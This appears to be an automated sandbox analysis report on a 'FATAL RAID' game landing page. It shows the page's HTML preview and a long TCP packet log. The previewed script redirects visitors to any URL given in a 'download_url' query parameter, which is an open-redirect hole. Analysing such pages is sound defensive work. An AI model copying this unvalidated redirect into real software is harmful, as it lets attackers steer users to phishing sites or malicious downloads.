Preview:	.<!DOCTYPE html>.<html>..<head>...<meta charset="UTF-8">...<title>No.1 mobile FPS game FATAL RAID</title>...<meta property="og:type" content="website">...<meta property="og:site_name" content="No.1 mobile FPS game FATAL RAID">...<meta property="og:url" content="http://hub-res.selvas.com/market/fatalraid/en/hub.html">...<meta property="og:title" content="No.1 mobile FPS game FATAL RAID">...<meta property="og:image" content="http://hub-res.selvas.com/market/fatalraid/en/img/title.jpg">...<meta property="og:description" content="The most realistic gunplay ever!">...<meta name="description" content="The most realistic gunplay ever!">...<meta http-equiv="X-UA-Compatible" content="IE=edge">..</head>..<body>...<script>....var query = window.location.search.substring(1);....var vars = query.split("&");....for (var i=0;i<vars.length;i++) {.....var pair = vars[i].split("=");.....if(pair[0] == "download_url") {......window.location.href = decodeURIComponent(pair[1]);.....}....}...</script>..</b

Static File Info

⊘No static file info

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 2, 2024 18:44:14.408960104 CEST	49673	443	192.168.2.6	173.222.162.64
Oct 2, 2024 18:44:14.409128904 CEST	49674	443	192.168.2.6	173.222.162.64
Oct 2, 2024 18:44:14.737056971 CEST	49672	443	192.168.2.6	173.222.162.64
Oct 2, 2024 18:44:23.307555914 CEST	49715	443	192.168.2.6	40.115.3.253
Oct 2, 2024 18:44:23.307583094 CEST	443	49715	40.115.3.253	192.168.2.6
Oct 2, 2024 18:44:23.307771921 CEST	49715	443	192.168.2.6	40.115.3.253
Oct 2, 2024 18:44:23.308461905 CEST	49715	443	192.168.2.6	40.115.3.253
Oct 2, 2024 18:44:23.308475971 CEST	443	49715	40.115.3.253	192.168.2.6
Oct 2, 2024 18:44:23.910459995 CEST	49716	80	192.168.2.6	52.219.162.147
Oct 2, 2024 18:44:23.910926104 CEST	49717	80	192.168.2.6	52.219.162.147
Oct 2, 2024 18:44:23.915467978 CEST	80	49716	52.219.162.147	192.168.2.6
Oct 2, 2024 18:44:23.915548086 CEST	49716	80	192.168.2.6	52.219.162.147
Oct 2, 2024 18:44:23.915723085 CEST	49716	80	192.168.2.6	52.219.162.147
Oct 2, 2024 18:44:23.915951967 CEST	80	49717	52.219.162.147	192.168.2.6
Oct 2, 2024 18:44:23.916048050 CEST	49717	80	192.168.2.6	52.219.162.147
Oct 2, 2024 18:44:23.920732021 CEST	80	49716	52.219.162.147	192.168.2.6
Oct 2, 2024 18:44:24.018534899 CEST	49674	443	192.168.2.6	173.222.162.64
Oct 2, 2024 18:44:24.107928991 CEST	443	49715	40.115.3.253	192.168.2.6
Oct 2, 2024 18:44:24.108032942 CEST	49715	443	192.168.2.6	40.115.3.253
Oct 2, 2024 18:44:24.121969938 CEST	49715	443	192.168.2.6	40.115.3.253
Oct 2, 2024 18:44:24.121989012 CEST	443	49715	40.115.3.253	192.168.2.6
Oct 2, 2024 18:44:24.122445107 CEST	443	49715	40.115.3.253	192.168.2.6
Oct 2, 2024 18:44:24.130645037 CEST	49715	443	192.168.2.6	40.115.3.253
Oct 2, 2024 18:44:24.130714893 CEST	49715	443	192.168.2.6	40.115.3.253
Oct 2, 2024 18:44:24.130719900 CEST	443	49715	40.115.3.253	192.168.2.6
Oct 2, 2024 18:44:24.130867004 CEST	49715	443	192.168.2.6	40.115.3.253
Oct 2, 2024 18:44:24.175410032 CEST	443	49715	40.115.3.253	192.168.2.6
Oct 2, 2024 18:44:24.188328981 CEST	49673	443	192.168.2.6	173.222.162.64
Oct 2, 2024 18:44:24.300401926 CEST	443	49715	40.115.3.253	192.168.2.6
Oct 2, 2024 18:44:24.300800085 CEST	443	49715	40.115.3.253	192.168.2.6
Oct 2, 2024 18:44:24.300895929 CEST	49715	443	192.168.2.6	40.115.3.253
Oct 2, 2024 18:44:24.301498890 CEST	49715	443	192.168.2.6	40.115.3.253
Oct 2, 2024 18:44:24.301517010 CEST	443	49715	40.115.3.253	192.168.2.6
Oct 2, 2024 18:44:24.344968081 CEST	49672	443	192.168.2.6	173.222.162.64
Oct 2, 2024 18:44:25.346530914 CEST	80	49716	52.219.162.147	192.168.2.6
Oct 2, 2024 18:44:25.346570015 CEST	80	49716	52.219.162.147	192.168.2.6
Oct 2, 2024 18:44:25.346602917 CEST	80	49716	52.219.162.147	192.168.2.6
Oct 2, 2024 18:44:25.346616983 CEST	49716	80	192.168.2.6	52.219.162.147
Oct 2, 2024 18:44:25.346656084 CEST	49716	80	192.168.2.6	52.219.162.147
Oct 2, 2024 18:44:25.346719027 CEST	80	49716	52.219.162.147	192.168.2.6
Oct 2, 2024 18:44:25.346755028 CEST	49716	80	192.168.2.6	52.219.162.147
Oct 2, 2024 18:44:26.002888918 CEST	49720	443	192.168.2.6	185.172.129.102
Oct 2, 2024 18:44:26.002971888 CEST	443	49720	185.172.129.102	192.168.2.6
Oct 2, 2024 18:44:26.003043890 CEST	49720	443	192.168.2.6	185.172.129.102
Oct 2, 2024 18:44:26.003523111 CEST	49721	443	192.168.2.6	185.172.129.102
Oct 2, 2024 18:44:26.003563881 CEST	443	49721	185.172.129.102	192.168.2.6
Oct 2, 2024 18:44:26.003619909 CEST	49721	443	192.168.2.6	185.172.129.102
Oct 2, 2024 18:44:26.005697966 CEST	49721	443	192.168.2.6	185.172.129.102
Oct 2, 2024 18:44:26.005716085 CEST	443	49721	185.172.129.102	192.168.2.6
Oct 2, 2024 18:44:26.006206036 CEST	49720	443	192.168.2.6	185.172.129.102
Oct 2, 2024 18:44:26.006242037 CEST	443	49720	185.172.129.102	192.168.2.6
Oct 2, 2024 18:44:26.204678059 CEST	443	49705	173.222.162.64	192.168.2.6
Oct 2, 2024 18:44:26.204909086 CEST	49705	443	192.168.2.6	173.222.162.64
Oct 2, 2024 18:44:26.483256102 CEST	443	49720	185.172.129.102	192.168.2.6
Oct 2, 2024 18:44:26.484893084 CEST	443	49721	185.172.129.102	192.168.2.6
Oct 2, 2024 18:44:26.489300013 CEST	49721	443	192.168.2.6	185.172.129.102
Oct 2, 2024 18:44:26.489311934 CEST	443	49721	185.172.129.102	192.168.2.6
Oct 2, 2024 18:44:26.489650011 CEST	49720	443	192.168.2.6	185.172.129.102
Oct 2, 2024 18:44:26.489691973 CEST	443	49720	185.172.129.102	192.168.2.6
Oct 2, 2024 18:44:26.490279913 CEST	443	49721	185.172.129.102	192.168.2.6
Oct 2, 2024 18:44:26.490381956 CEST	49721	443	192.168.2.6	185.172.129.102
Oct 2, 2024 18:44:26.491311073 CEST	443	49720	185.172.129.102	192.168.2.6
Oct 2, 2024 18:44:26.491419077 CEST	49720	443	192.168.2.6	185.172.129.102
Oct 2, 2024 18:44:26.505028009 CEST	49721	443	192.168.2.6	185.172.129.102
Oct 2, 2024 18:44:26.505089045 CEST	443	49721	185.172.129.102	192.168.2.6
Oct 2, 2024 18:44:26.505275011 CEST	49721	443	192.168.2.6	185.172.129.102
Oct 2, 2024 18:44:26.505287886 CEST	443	49721	185.172.129.102	192.168.2.6
Oct 2, 2024 18:44:26.505626917 CEST	49720	443	192.168.2.6	185.172.129.102
Oct 2, 2024 18:44:26.505755901 CEST	443	49720	185.172.129.102	192.168.2.6
Oct 2, 2024 18:44:26.513617039 CEST	49722	443	192.168.2.6	142.250.186.132
Oct 2, 2024 18:44:26.513654947 CEST	443	49722	142.250.186.132	192.168.2.6
Oct 2, 2024 18:44:26.513717890 CEST	49722	443	192.168.2.6	142.250.186.132
Oct 2, 2024 18:44:26.514317036 CEST	49722	443	192.168.2.6	142.250.186.132
Oct 2, 2024 18:44:26.514333963 CEST	443	49722	142.250.186.132	192.168.2.6
Oct 2, 2024 18:44:26.551831007 CEST	49720	443	192.168.2.6	185.172.129.102
Oct 2, 2024 18:44:26.551832914 CEST	49721	443	192.168.2.6	185.172.129.102
Oct 2, 2024 18:44:26.551873922 CEST	443	49720	185.172.129.102	192.168.2.6
Oct 2, 2024 18:44:26.596069098 CEST	49720	443	192.168.2.6	185.172.129.102
Oct 2, 2024 18:44:27.150959015 CEST	443	49722	142.250.186.132	192.168.2.6
Oct 2, 2024 18:44:27.187635899 CEST	49722	443	192.168.2.6	142.250.186.132
Oct 2, 2024 18:44:27.187652111 CEST	443	49722	142.250.186.132	192.168.2.6
Oct 2, 2024 18:44:27.190713882 CEST	443	49722	142.250.186.132	192.168.2.6
Oct 2, 2024 18:44:27.190800905 CEST	49722	443	192.168.2.6	142.250.186.132
Oct 2, 2024 18:44:27.209728003 CEST	49722	443	192.168.2.6	142.250.186.132
Oct 2, 2024 18:44:27.209925890 CEST	443	49722	142.250.186.132	192.168.2.6
Oct 2, 2024 18:44:27.223880053 CEST	443	49721	185.172.129.102	192.168.2.6
Oct 2, 2024 18:44:27.252475977 CEST	49722	443	192.168.2.6	142.250.186.132
Oct 2, 2024 18:44:27.252487898 CEST	443	49722	142.250.186.132	192.168.2.6
Oct 2, 2024 18:44:27.266122103 CEST	49721	443	192.168.2.6	185.172.129.102
Oct 2, 2024 18:44:27.297729969 CEST	49722	443	192.168.2.6	142.250.186.132
Oct 2, 2024 18:44:27.318835020 CEST	443	49721	185.172.129.102	192.168.2.6
Oct 2, 2024 18:44:27.318877935 CEST	443	49721	185.172.129.102	192.168.2.6
Oct 2, 2024 18:44:27.318896055 CEST	443	49721	185.172.129.102	192.168.2.6
Oct 2, 2024 18:44:27.318947077 CEST	443	49721	185.172.129.102	192.168.2.6
Oct 2, 2024 18:44:27.318948984 CEST	49721	443	192.168.2.6	185.172.129.102
Oct 2, 2024 18:44:27.318968058 CEST	443	49721	185.172.129.102	192.168.2.6
Oct 2, 2024 18:44:27.318996906 CEST	443	49721	185.172.129.102	192.168.2.6
Oct 2, 2024 18:44:27.319011927 CEST	49721	443	192.168.2.6	185.172.129.102
Oct 2, 2024 18:44:27.319045067 CEST	443	49721	185.172.129.102	192.168.2.6
Oct 2, 2024 18:44:27.319072962 CEST	49721	443	192.168.2.6	185.172.129.102
Oct 2, 2024 18:44:27.319135904 CEST	49721	443	192.168.2.6	185.172.129.102
Oct 2, 2024 18:44:27.319628000 CEST	443	49721	185.172.129.102	192.168.2.6
Oct 2, 2024 18:44:27.319680929 CEST	443	49721	185.172.129.102	192.168.2.6
Oct 2, 2024 18:44:27.319714069 CEST	49721	443	192.168.2.6	185.172.129.102
Oct 2, 2024 18:44:27.319726944 CEST	443	49721	185.172.129.102	192.168.2.6
Oct 2, 2024 18:44:27.319770098 CEST	49721	443	192.168.2.6	185.172.129.102
Oct 2, 2024 18:44:27.319794893 CEST	49721	443	192.168.2.6	185.172.129.102
Oct 2, 2024 18:44:27.325124979 CEST	443	49721	185.172.129.102	192.168.2.6
Oct 2, 2024 18:44:27.325191021 CEST	443	49721	185.172.129.102	192.168.2.6
Oct 2, 2024 18:44:27.325229883 CEST	49721	443	192.168.2.6	185.172.129.102
Oct 2, 2024 18:44:27.325242043 CEST	443	49721	185.172.129.102	192.168.2.6
Oct 2, 2024 18:44:27.325284958 CEST	49721	443	192.168.2.6	185.172.129.102
Oct 2, 2024 18:44:27.325306892 CEST	49721	443	192.168.2.6	185.172.129.102
Oct 2, 2024 18:44:27.412782907 CEST	443	49721	185.172.129.102	192.168.2.6
Oct 2, 2024 18:44:27.412817001 CEST	443	49721	185.172.129.102	192.168.2.6
Oct 2, 2024 18:44:27.412910938 CEST	49721	443	192.168.2.6	185.172.129.102
Oct 2, 2024 18:44:27.412938118 CEST	443	49721	185.172.129.102	192.168.2.6
Oct 2, 2024 18:44:27.412976027 CEST	49721	443	192.168.2.6	185.172.129.102
Oct 2, 2024 18:44:27.413007021 CEST	49721	443	192.168.2.6	185.172.129.102
Oct 2, 2024 18:44:27.413933039 CEST	443	49721	185.172.129.102	192.168.2.6
Oct 2, 2024 18:44:27.413953066 CEST	443	49721	185.172.129.102	192.168.2.6
Oct 2, 2024 18:44:27.414026976 CEST	49721	443	192.168.2.6	185.172.129.102
Oct 2, 2024 18:44:27.414041042 CEST	443	49721	185.172.129.102	192.168.2.6
Oct 2, 2024 18:44:27.414096117 CEST	49721	443	192.168.2.6	185.172.129.102
Oct 2, 2024 18:44:27.415791035 CEST	443	49721	185.172.129.102	192.168.2.6
Oct 2, 2024 18:44:27.415834904 CEST	443	49721	185.172.129.102	192.168.2.6
Oct 2, 2024 18:44:27.415877104 CEST	49721	443	192.168.2.6	185.172.129.102
Oct 2, 2024 18:44:27.415889978 CEST	443	49721	185.172.129.102	192.168.2.6
Oct 2, 2024 18:44:27.415937901 CEST	49721	443	192.168.2.6	185.172.129.102
Oct 2, 2024 18:44:27.415956974 CEST	49721	443	192.168.2.6	185.172.129.102
Oct 2, 2024 18:44:27.499977112 CEST	443	49721	185.172.129.102	192.168.2.6
Oct 2, 2024 18:44:27.500025034 CEST	443	49721	185.172.129.102	192.168.2.6
Oct 2, 2024 18:44:27.500093937 CEST	49721	443	192.168.2.6	185.172.129.102
Oct 2, 2024 18:44:27.500112057 CEST	443	49721	185.172.129.102	192.168.2.6
Oct 2, 2024 18:44:27.500154018 CEST	49721	443	192.168.2.6	185.172.129.102
Oct 2, 2024 18:44:27.500178099 CEST	49721	443	192.168.2.6	185.172.129.102
Oct 2, 2024 18:44:27.500894070 CEST	443	49721	185.172.129.102	192.168.2.6
Oct 2, 2024 18:44:27.500915051 CEST	443	49721	185.172.129.102	192.168.2.6
Oct 2, 2024 18:44:27.501010895 CEST	49721	443	192.168.2.6	185.172.129.102
Oct 2, 2024 18:44:27.501023054 CEST	443	49721	185.172.129.102	192.168.2.6
Oct 2, 2024 18:44:27.501081944 CEST	49721	443	192.168.2.6	185.172.129.102
Oct 2, 2024 18:44:27.502811909 CEST	443	49721	185.172.129.102	192.168.2.6
Oct 2, 2024 18:44:27.502832890 CEST	443	49721	185.172.129.102	192.168.2.6
Oct 2, 2024 18:44:27.502924919 CEST	49721	443	192.168.2.6	185.172.129.102
Oct 2, 2024 18:44:27.502938032 CEST	443	49721	185.172.129.102	192.168.2.6
Oct 2, 2024 18:44:27.502990007 CEST	49721	443	192.168.2.6	185.172.129.102
Oct 2, 2024 18:44:27.506903887 CEST	443	49721	185.172.129.102	192.168.2.6
Oct 2, 2024 18:44:27.506925106 CEST	443	49721	185.172.129.102	192.168.2.6
Oct 2, 2024 18:44:27.506989002 CEST	49721	443	192.168.2.6	185.172.129.102
Oct 2, 2024 18:44:27.507000923 CEST	443	49721	185.172.129.102	192.168.2.6
Oct 2, 2024 18:44:27.507042885 CEST	49721	443	192.168.2.6	185.172.129.102
Oct 2, 2024 18:44:27.507065058 CEST	49721	443	192.168.2.6	185.172.129.102
Oct 2, 2024 18:44:27.562963009 CEST	49723	443	192.168.2.6	184.28.90.27
Oct 2, 2024 18:44:27.563043118 CEST	443	49723	184.28.90.27	192.168.2.6
Oct 2, 2024 18:44:27.563142061 CEST	49723	443	192.168.2.6	184.28.90.27
Oct 2, 2024 18:44:27.566042900 CEST	49723	443	192.168.2.6	184.28.90.27
Oct 2, 2024 18:44:27.566077948 CEST	443	49723	184.28.90.27	192.168.2.6
Oct 2, 2024 18:44:27.588160992 CEST	443	49721	185.172.129.102	192.168.2.6
Oct 2, 2024 18:44:27.588190079 CEST	443	49721	185.172.129.102	192.168.2.6
Oct 2, 2024 18:44:27.588294029 CEST	49721	443	192.168.2.6	185.172.129.102
Oct 2, 2024 18:44:27.588303089 CEST	443	49721	185.172.129.102	192.168.2.6
Oct 2, 2024 18:44:27.588362932 CEST	49721	443	192.168.2.6	185.172.129.102
Oct 2, 2024 18:44:27.588651896 CEST	443	49721	185.172.129.102	192.168.2.6
Oct 2, 2024 18:44:27.588670969 CEST	443	49721	185.172.129.102	192.168.2.6
Oct 2, 2024 18:44:27.588726997 CEST	49721	443	192.168.2.6	185.172.129.102
Oct 2, 2024 18:44:27.588733912 CEST	443	49721	185.172.129.102	192.168.2.6
Oct 2, 2024 18:44:27.588778019 CEST	49721	443	192.168.2.6	185.172.129.102
Oct 2, 2024 18:44:27.589273930 CEST	443	49721	185.172.129.102	192.168.2.6
Oct 2, 2024 18:44:27.589296103 CEST	443	49721	185.172.129.102	192.168.2.6
Oct 2, 2024 18:44:27.589346886 CEST	49721	443	192.168.2.6	185.172.129.102
Oct 2, 2024 18:44:27.589351892 CEST	443	49721	185.172.129.102	192.168.2.6
Oct 2, 2024 18:44:27.589396954 CEST	49721	443	192.168.2.6	185.172.129.102
Oct 2, 2024 18:44:27.589764118 CEST	443	49721	185.172.129.102	192.168.2.6
Oct 2, 2024 18:44:27.589782953 CEST	443	49721	185.172.129.102	192.168.2.6
Oct 2, 2024 18:44:27.589837074 CEST	49721	443	192.168.2.6	185.172.129.102
Oct 2, 2024 18:44:27.589843035 CEST	443	49721	185.172.129.102	192.168.2.6
Oct 2, 2024 18:44:27.589865923 CEST	49721	443	192.168.2.6	185.172.129.102
Oct 2, 2024 18:44:27.589895010 CEST	49721	443	192.168.2.6	185.172.129.102
Oct 2, 2024 18:44:27.590352058 CEST	443	49721	185.172.129.102	192.168.2.6
Oct 2, 2024 18:44:27.590372086 CEST	443	49721	185.172.129.102	192.168.2.6
Oct 2, 2024 18:44:27.590441942 CEST	49721	443	192.168.2.6	185.172.129.102
Oct 2, 2024 18:44:27.590449095 CEST	443	49721	185.172.129.102	192.168.2.6
Oct 2, 2024 18:44:27.590486050 CEST	49721	443	192.168.2.6	185.172.129.102
Oct 2, 2024 18:44:27.591092110 CEST	443	49721	185.172.129.102	192.168.2.6
Oct 2, 2024 18:44:27.591111898 CEST	443	49721	185.172.129.102	192.168.2.6
Oct 2, 2024 18:44:27.591167927 CEST	49721	443	192.168.2.6	185.172.129.102
Oct 2, 2024 18:44:27.591172934 CEST	443	49721	185.172.129.102	192.168.2.6
Oct 2, 2024 18:44:27.591232061 CEST	49721	443	192.168.2.6	185.172.129.102
Oct 2, 2024 18:44:27.591871977 CEST	443	49721	185.172.129.102	192.168.2.6
Oct 2, 2024 18:44:27.591892958 CEST	443	49721	185.172.129.102	192.168.2.6
Oct 2, 2024 18:44:27.591929913 CEST	49721	443	192.168.2.6	185.172.129.102
Oct 2, 2024 18:44:27.591936111 CEST	443	49721	185.172.129.102	192.168.2.6
Oct 2, 2024 18:44:27.592000008 CEST	49721	443	192.168.2.6	185.172.129.102
Oct 2, 2024 18:44:27.593538046 CEST	443	49721	185.172.129.102	192.168.2.6
Oct 2, 2024 18:44:27.593556881 CEST	443	49721	185.172.129.102	192.168.2.6
Oct 2, 2024 18:44:27.593626022 CEST	49721	443	192.168.2.6	185.172.129.102
Oct 2, 2024 18:44:27.593631983 CEST	443	49721	185.172.129.102	192.168.2.6
Oct 2, 2024 18:44:27.593662024 CEST	49721	443	192.168.2.6	185.172.129.102
Oct 2, 2024 18:44:27.593686104 CEST	49721	443	192.168.2.6	185.172.129.102
Oct 2, 2024 18:44:27.676991940 CEST	443	49721	185.172.129.102	192.168.2.6
Oct 2, 2024 18:44:27.677062988 CEST	443	49721	185.172.129.102	192.168.2.6
Oct 2, 2024 18:44:27.677134037 CEST	49721	443	192.168.2.6	185.172.129.102
Oct 2, 2024 18:44:27.677145004 CEST	443	49721	185.172.129.102	192.168.2.6
Oct 2, 2024 18:44:27.677195072 CEST	49721	443	192.168.2.6	185.172.129.102
Oct 2, 2024 18:44:27.677464962 CEST	443	49721	185.172.129.102	192.168.2.6
Oct 2, 2024 18:44:27.677516937 CEST	443	49721	185.172.129.102	192.168.2.6
Oct 2, 2024 18:44:27.677550077 CEST	49721	443	192.168.2.6	185.172.129.102
Oct 2, 2024 18:44:27.677555084 CEST	443	49721	185.172.129.102	192.168.2.6
Oct 2, 2024 18:44:27.677582979 CEST	49721	443	192.168.2.6	185.172.129.102
Oct 2, 2024 18:44:27.677611113 CEST	49721	443	192.168.2.6	185.172.129.102
Oct 2, 2024 18:44:27.678066969 CEST	443	49721	185.172.129.102	192.168.2.6
Oct 2, 2024 18:44:27.678108931 CEST	443	49721	185.172.129.102	192.168.2.6
Oct 2, 2024 18:44:27.678159952 CEST	49721	443	192.168.2.6	185.172.129.102
Oct 2, 2024 18:44:27.678165913 CEST	443	49721	185.172.129.102	192.168.2.6
Oct 2, 2024 18:44:27.678232908 CEST	49721	443	192.168.2.6	185.172.129.102
Oct 2, 2024 18:44:27.678679943 CEST	443	49721	185.172.129.102	192.168.2.6
Oct 2, 2024 18:44:27.678739071 CEST	443	49721	185.172.129.102	192.168.2.6
Oct 2, 2024 18:44:27.678783894 CEST	49721	443	192.168.2.6	185.172.129.102
Oct 2, 2024 18:44:27.678790092 CEST	443	49721	185.172.129.102	192.168.2.6
Oct 2, 2024 18:44:27.678822994 CEST	49721	443	192.168.2.6	185.172.129.102
Oct 2, 2024 18:44:27.678848982 CEST	49721	443	192.168.2.6	185.172.129.102
Oct 2, 2024 18:44:27.679368019 CEST	443	49721	185.172.129.102	192.168.2.6
Oct 2, 2024 18:44:27.679445028 CEST	443	49721	185.172.129.102	192.168.2.6
Oct 2, 2024 18:44:27.679465055 CEST	49721	443	192.168.2.6	185.172.129.102
Oct 2, 2024 18:44:27.679471016 CEST	443	49721	185.172.129.102	192.168.2.6
Oct 2, 2024 18:44:27.679696083 CEST	443	49721	185.172.129.102	192.168.2.6
Oct 2, 2024 18:44:27.679737091 CEST	49721	443	192.168.2.6	185.172.129.102
Oct 2, 2024 18:44:27.679749012 CEST	443	49721	185.172.129.102	192.168.2.6
Oct 2, 2024 18:44:27.679761887 CEST	49721	443	192.168.2.6	185.172.129.102
Oct 2, 2024 18:44:27.679786921 CEST	443	49721	185.172.129.102	192.168.2.6
Oct 2, 2024 18:44:27.679841995 CEST	49721	443	192.168.2.6	185.172.129.102
Oct 2, 2024 18:44:27.680378914 CEST	443	49721	185.172.129.102	192.168.2.6
Oct 2, 2024 18:44:27.680424929 CEST	443	49721	185.172.129.102	192.168.2.6
Oct 2, 2024 18:44:27.680453062 CEST	49721	443	192.168.2.6	185.172.129.102
Oct 2, 2024 18:44:27.680469036 CEST	443	49721	185.172.129.102	192.168.2.6
Oct 2, 2024 18:44:27.680496931 CEST	49721	443	192.168.2.6	185.172.129.102
Oct 2, 2024 18:44:27.680521965 CEST	49721	443	192.168.2.6	185.172.129.102
Oct 2, 2024 18:44:27.680613995 CEST	443	49721	185.172.129.102	192.168.2.6
Oct 2, 2024 18:44:27.680891037 CEST	49721	443	192.168.2.6	185.172.129.102
Oct 2, 2024 18:44:27.681499004 CEST	49721	443	192.168.2.6	185.172.129.102
Oct 2, 2024 18:44:27.681516886 CEST	443	49721	185.172.129.102	192.168.2.6
Oct 2, 2024 18:44:28.229557991 CEST	443	49723	184.28.90.27	192.168.2.6
Oct 2, 2024 18:44:28.229724884 CEST	49723	443	192.168.2.6	184.28.90.27
Oct 2, 2024 18:44:28.233805895 CEST	49723	443	192.168.2.6	184.28.90.27
Oct 2, 2024 18:44:28.233839035 CEST	443	49723	184.28.90.27	192.168.2.6
Oct 2, 2024 18:44:28.234268904 CEST	443	49723	184.28.90.27	192.168.2.6
Oct 2, 2024 18:44:28.289778948 CEST	49723	443	192.168.2.6	184.28.90.27
Oct 2, 2024 18:44:28.354685068 CEST	49723	443	192.168.2.6	184.28.90.27
Oct 2, 2024 18:44:28.399405003 CEST	443	49723	184.28.90.27	192.168.2.6
Oct 2, 2024 18:44:28.544015884 CEST	443	49723	184.28.90.27	192.168.2.6
Oct 2, 2024 18:44:28.544511080 CEST	443	49723	184.28.90.27	192.168.2.6
Oct 2, 2024 18:44:28.544591904 CEST	49723	443	192.168.2.6	184.28.90.27
Oct 2, 2024 18:44:28.644301891 CEST	49723	443	192.168.2.6	184.28.90.27
Oct 2, 2024 18:44:28.644303083 CEST	49723	443	192.168.2.6	184.28.90.27
Oct 2, 2024 18:44:28.644376993 CEST	443	49723	184.28.90.27	192.168.2.6
Oct 2, 2024 18:44:28.644412041 CEST	443	49723	184.28.90.27	192.168.2.6
Oct 2, 2024 18:44:28.755208015 CEST	49724	443	192.168.2.6	184.28.90.27
Oct 2, 2024 18:44:28.755261898 CEST	443	49724	184.28.90.27	192.168.2.6
Oct 2, 2024 18:44:28.755354881 CEST	49724	443	192.168.2.6	184.28.90.27
Oct 2, 2024 18:44:28.756398916 CEST	49724	443	192.168.2.6	184.28.90.27
Oct 2, 2024 18:44:28.756423950 CEST	443	49724	184.28.90.27	192.168.2.6
Oct 2, 2024 18:44:29.417496920 CEST	443	49724	184.28.90.27	192.168.2.6
Oct 2, 2024 18:44:29.417741060 CEST	49724	443	192.168.2.6	184.28.90.27
Oct 2, 2024 18:44:29.420540094 CEST	49724	443	192.168.2.6	184.28.90.27
Oct 2, 2024 18:44:29.420592070 CEST	443	49724	184.28.90.27	192.168.2.6
Oct 2, 2024 18:44:29.421019077 CEST	443	49724	184.28.90.27	192.168.2.6
Oct 2, 2024 18:44:29.424060106 CEST	49724	443	192.168.2.6	184.28.90.27
Oct 2, 2024 18:44:29.471427917 CEST	443	49724	184.28.90.27	192.168.2.6
Oct 2, 2024 18:44:29.698039055 CEST	443	49724	184.28.90.27	192.168.2.6
Oct 2, 2024 18:44:29.698210001 CEST	443	49724	184.28.90.27	192.168.2.6
Oct 2, 2024 18:44:29.698462963 CEST	49724	443	192.168.2.6	184.28.90.27
Oct 2, 2024 18:44:29.699712992 CEST	49724	443	192.168.2.6	184.28.90.27
Oct 2, 2024 18:44:29.699754000 CEST	443	49724	184.28.90.27	192.168.2.6
Oct 2, 2024 18:44:29.699790955 CEST	49724	443	192.168.2.6	184.28.90.27
Oct 2, 2024 18:44:29.699806929 CEST	443	49724	184.28.90.27	192.168.2.6
Oct 2, 2024 18:44:31.279834032 CEST	49725	443	192.168.2.6	40.115.3.253
Oct 2, 2024 18:44:31.279932976 CEST	443	49725	40.115.3.253	192.168.2.6
Oct 2, 2024 18:44:31.280023098 CEST	49725	443	192.168.2.6	40.115.3.253
Oct 2, 2024 18:44:31.282074928 CEST	49725	443	192.168.2.6	40.115.3.253
Oct 2, 2024 18:44:31.282111883 CEST	443	49725	40.115.3.253	192.168.2.6
Oct 2, 2024 18:44:32.176311016 CEST	443	49725	40.115.3.253	192.168.2.6
Oct 2, 2024 18:44:32.176527977 CEST	49725	443	192.168.2.6	40.115.3.253
Oct 2, 2024 18:44:32.180069923 CEST	49725	443	192.168.2.6	40.115.3.253
Oct 2, 2024 18:44:32.180102110 CEST	443	49725	40.115.3.253	192.168.2.6
Oct 2, 2024 18:44:32.180495024 CEST	443	49725	40.115.3.253	192.168.2.6
Oct 2, 2024 18:44:32.182693005 CEST	49725	443	192.168.2.6	40.115.3.253
Oct 2, 2024 18:44:32.182815075 CEST	49725	443	192.168.2.6	40.115.3.253
Oct 2, 2024 18:44:32.182827950 CEST	443	49725	40.115.3.253	192.168.2.6
Oct 2, 2024 18:44:32.183063030 CEST	49725	443	192.168.2.6	40.115.3.253
Oct 2, 2024 18:44:32.223413944 CEST	443	49725	40.115.3.253	192.168.2.6
Oct 2, 2024 18:44:32.360114098 CEST	443	49725	40.115.3.253	192.168.2.6
Oct 2, 2024 18:44:32.360299110 CEST	443	49725	40.115.3.253	192.168.2.6
Oct 2, 2024 18:44:32.360572100 CEST	49725	443	192.168.2.6	40.115.3.253
Oct 2, 2024 18:44:32.360573053 CEST	49725	443	192.168.2.6	40.115.3.253
Oct 2, 2024 18:44:32.674648046 CEST	49725	443	192.168.2.6	40.115.3.253
Oct 2, 2024 18:44:32.674730062 CEST	443	49725	40.115.3.253	192.168.2.6
Oct 2, 2024 18:44:34.396987915 CEST	49726	443	192.168.2.6	4.175.87.197
Oct 2, 2024 18:44:34.397032022 CEST	443	49726	4.175.87.197	192.168.2.6
Oct 2, 2024 18:44:34.397337914 CEST	49726	443	192.168.2.6	4.175.87.197
Oct 2, 2024 18:44:34.398474932 CEST	49726	443	192.168.2.6	4.175.87.197
Oct 2, 2024 18:44:34.398484945 CEST	443	49726	4.175.87.197	192.168.2.6
Oct 2, 2024 18:44:35.195450068 CEST	443	49726	4.175.87.197	192.168.2.6
Oct 2, 2024 18:44:35.195538998 CEST	49726	443	192.168.2.6	4.175.87.197
Oct 2, 2024 18:44:35.198080063 CEST	49726	443	192.168.2.6	4.175.87.197
Oct 2, 2024 18:44:35.198090076 CEST	443	49726	4.175.87.197	192.168.2.6
Oct 2, 2024 18:44:35.198577881 CEST	443	49726	4.175.87.197	192.168.2.6
Oct 2, 2024 18:44:35.251611948 CEST	49726	443	192.168.2.6	4.175.87.197
Oct 2, 2024 18:44:35.294990063 CEST	49726	443	192.168.2.6	4.175.87.197
Oct 2, 2024 18:44:35.335395098 CEST	443	49726	4.175.87.197	192.168.2.6
Oct 2, 2024 18:44:35.553742886 CEST	443	49726	4.175.87.197	192.168.2.6
Oct 2, 2024 18:44:35.553778887 CEST	443	49726	4.175.87.197	192.168.2.6
Oct 2, 2024 18:44:35.553790092 CEST	443	49726	4.175.87.197	192.168.2.6
Oct 2, 2024 18:44:35.553817034 CEST	443	49726	4.175.87.197	192.168.2.6
Oct 2, 2024 18:44:35.553833961 CEST	443	49726	4.175.87.197	192.168.2.6
Oct 2, 2024 18:44:35.553845882 CEST	443	49726	4.175.87.197	192.168.2.6
Oct 2, 2024 18:44:35.553848982 CEST	49726	443	192.168.2.6	4.175.87.197
Oct 2, 2024 18:44:35.553878069 CEST	443	49726	4.175.87.197	192.168.2.6
Oct 2, 2024 18:44:35.553898096 CEST	49726	443	192.168.2.6	4.175.87.197
Oct 2, 2024 18:44:35.553908110 CEST	443	49726	4.175.87.197	192.168.2.6
Oct 2, 2024 18:44:35.553925037 CEST	443	49726	4.175.87.197	192.168.2.6
Oct 2, 2024 18:44:35.553935051 CEST	49726	443	192.168.2.6	4.175.87.197
Oct 2, 2024 18:44:35.553942919 CEST	443	49726	4.175.87.197	192.168.2.6
